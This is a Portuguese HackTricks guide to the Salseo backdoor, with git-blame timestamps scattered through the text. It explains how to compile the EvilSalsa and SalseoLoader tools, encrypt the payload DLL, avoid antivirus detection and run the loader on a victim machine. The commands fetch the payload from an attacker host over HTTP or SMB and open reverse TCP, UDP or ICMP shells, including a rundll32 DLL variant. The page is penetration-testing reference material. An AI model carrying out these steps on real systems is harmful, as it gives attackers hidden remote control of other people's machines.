2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
< details >
2023-12-30 12:05:49 +00:00
< summary > < strong > Aprenda hacking no AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-30 12:05:49 +00:00
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
* Adquira o [**material oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção de [**NFTs** ](https://opensea.io/collection/the-peass-family ) exclusivos
* **Junte-se ao grupo** 💬 [**Discord** ](https://discord.gg/hRep4RUj7f ) ou ao grupo [**telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2023-06-06 18:56:34 +00:00
## Compilando os binários
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Baixe o código-fonte do github e compile **EvilSalsa** e **SalseoLoader** . Você precisará do **Visual Studio** instalado para compilar o código.
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Compile esses projetos para a arquitetura do sistema Windows onde você vai usá-los (Se o Windows suportar x64, compile para essa arquitetura).
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Você pode **selecionar a arquitetura** dentro do Visual Studio na aba ** "Build"** à esquerda em ** "Platform Target".**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
(**Se você não encontrar essas opções, pressione na aba "Project"** e depois em ** "\<Project Name> Properties"**)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
![](< .. / . gitbook / assets / image ( 132 ) . png > )
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Em seguida, construa ambos os projetos (Build -> Build Solution) (Dentro dos logs aparecerá o caminho do executável):
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
![](< .. / . gitbook / assets / image ( 1 ) ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
## Prepare o Backdoor
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Primeiramente, você precisará codificar o **EvilSalsa.dll.** Para fazer isso, você pode usar o script python **encrypterassembly.py** ou você pode compilar o projeto **EncrypterAssembly** :
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Python**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2023-12-30 12:05:49 +00:00
### Windows
2023-06-06 18:56:34 +00:00
```
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2023-12-30 12:05:49 +00:00
Ok, agora você tem tudo o que precisa para executar todo o esquema do Salseo: o **EvilDalsa.dll codificado** e o **binário do SalseoLoader.**
2023-06-06 18:56:34 +00:00
2023-12-30 12:05:49 +00:00
**Envie o binário SalseoLoader.exe para a máquina. Eles não devem ser detectados por nenhum AV...**
2023-06-06 18:56:34 +00:00
2023-12-30 12:05:49 +00:00
## **Execute a porta dos fundos**
2023-06-06 18:56:34 +00:00
2023-12-30 12:05:49 +00:00
### **Obtendo um shell reverso TCP (baixando dll codificada via HTTP)**
2023-06-06 18:56:34 +00:00
2023-12-30 12:05:49 +00:00
Lembre-se de iniciar um nc como o ouvinte do shell reverso e um servidor HTTP para servir o evilsalsa codificado.
2023-06-06 18:56:34 +00:00
```
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2023-12-30 12:05:49 +00:00
### **Obtendo um shell reverso UDP (baixando dll codificada através do SMB)**
2023-06-06 18:56:34 +00:00
2023-12-30 12:05:49 +00:00
Lembre-se de iniciar um nc como o ouvinte do shell reverso e um servidor SMB para servir o evilsalsa codificado (impacket-smbserver).
2023-06-06 18:56:34 +00:00
```
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2023-12-30 12:05:49 +00:00
### **Obtendo um shell reverso ICMP (dll codificada já dentro da vítima)**
2023-06-06 18:56:34 +00:00
**Desta vez, você precisa de uma ferramenta especial no cliente para receber o shell reverso. Baixe:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2023-08-15 18:30:18 +00:00
#### **Desativar Respostas ICMP:**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2023-12-30 12:05:49 +00:00
#### Execute o cliente:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2023-06-06 18:56:34 +00:00
#### Dentro da vítima, vamos executar o salseo:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2023-12-30 12:05:49 +00:00
## Compilando SalseoLoader como DLL exportando função principal
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Abra o projeto SalseoLoader usando o Visual Studio.
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
### Adicione antes da função principal: \[DllExport]
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
![](< .. / . gitbook / assets / image ( 2 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
### Instale DllExport para este projeto
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
#### **Ferramentas** --> **Gerenciador de Pacotes NuGet** --> **Gerenciar Pacotes NuGet para a Solução...**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
![](< .. / . gitbook / assets / image ( 3 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
#### **Procure pelo pacote DllExport (usando a aba Procurar), e pressione Instalar (e aceite o popup)**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
![](< .. / . gitbook / assets / image ( 4 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
No seu diretório do projeto apareceram os arquivos: **DllExport.bat** e **DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
### **Desinstale** DllExport
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Pressione **Desinstalar** (sim, é estranho, mas confie em mim, é necessário)
2020-07-15 15:43:14 +00:00
2023-06-14 11:54:08 +00:00
![](< .. / . gitbook / assets / image ( 5 ) ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
### **Saia do Visual Studio e execute DllExport\_configure**
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Apenas **saia** do Visual Studio
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Depois, vá até a sua **pasta SalseoLoader** e **execute DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Selecione **x64** (se você vai usar em um sistema x64, que foi o meu caso), selecione **System.Runtime.InteropServices** (dentro de **Namespace para DllExport** ) e pressione **Aplicar**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
![](< .. / . gitbook / assets / image ( 7 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
### **Abra o projeto novamente com o Visual Studio**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
**\[DllExport]** não deve mais ser marcado como erro
2020-07-15 15:43:14 +00:00
2023-06-13 10:21:57 +00:00
![](< .. / . gitbook / assets / image ( 8 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
### Construa a solução
2020-07-15 15:43:14 +00:00
2023-08-15 18:30:18 +00:00
Selecione **Tipo de Saída = Biblioteca de Classes** (Projeto --> Propriedades do SalseoLoader --> Aplicativo --> Tipo de saída = Biblioteca de Classes)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
![](< .. / . gitbook / assets / image ( 10 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Selecione **plataforma x64** (Projeto --> Propriedades do SalseoLoader --> Compilar --> Alvo da plataforma = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
![](< .. / . gitbook / assets / image ( 9 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Para **construir** a solução: Construir --> Construir Solução (Dentro do console de Saída o caminho da nova DLL aparecerá)
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
### Teste a Dll gerada
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Copie e cole a Dll onde você quer testá-la.
2020-07-15 15:43:14 +00:00
Execute:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2023-06-06 18:56:34 +00:00
Se nenhum erro aparecer, provavelmente você tem uma DLL funcional!!
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
## Obter um shell usando a DLL
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
Não se esqueça de usar um **servidor HTTP** e configurar um **listener nc**
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2022-08-04 20:47:35 +00:00
### CMD
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
< details >
2023-12-30 12:05:49 +00:00
< summary > < strong > Aprenda hacking no AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
Outras formas de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2023-12-30 12:05:49 +00:00
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
* Adquira o [**material oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
2023-06-06 18:56:34 +00:00
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2023-12-30 12:05:49 +00:00
* **Junte-se ao grupo** 💬 [**Discord** ](https://discord.gg/hRep4RUj7f ) ou ao grupo [**telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >